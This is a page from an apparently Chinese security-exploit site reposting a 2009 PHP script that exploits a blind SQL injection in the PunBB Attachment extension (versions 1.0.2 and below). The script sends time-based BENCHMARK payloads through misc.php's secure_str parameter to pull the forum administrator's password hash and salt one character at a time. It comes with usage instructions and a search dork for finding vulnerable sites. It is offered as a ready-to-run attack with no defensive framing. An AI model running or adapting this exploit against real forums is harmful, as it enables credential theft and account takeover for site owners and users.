PunBB Extension Attachment versions 1.0.2 and below remote SQL injection exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

PunBB Extension Attachment versions 1.0.2 and below remote SQL injection exploit

来源：http://www.wolvez.org 作者：puret_t 发布时间：2009-11-04

#!/usr/bin/php
<?php

print_r('
+--------------------------------------------------------------------------
-+
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PunBB"
+--------------------------------------------------------------------------
-+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+--------------------------------------------------------------------------
-+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to punbb
Example:
php '.$argv[0].' localhost /punbb/
+--------------------------------------------------------------------------
-+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$pre = 'pun_';

$benchmark = 200000000;
$timeout = 10;

echo "Plz Waiting...\nPassword:\n";
/**
* get pass
*/
$j = 1;
$pass = '';

$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 122)); //a-z letters

while (strlen($pass) < 40) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
$cmd =
'1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'us
ers%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$bench
mark.',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$pass .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}

echo "\nSalt:\n";
/**
* get salt
*/
$j = 1;
$salt = '';

$hash[0] = 0; //null
$hash = array_merge($hash, range(33, 126));

while (strlen($salt) < 12) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
$cmd =
'1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%
20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark
.',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$salt .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}

exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");

function send()
{
global $host, $path, $cmd;

$data = "GET ".$path."misc.php?item=1&secure_str=".$cmd."
HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);
fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告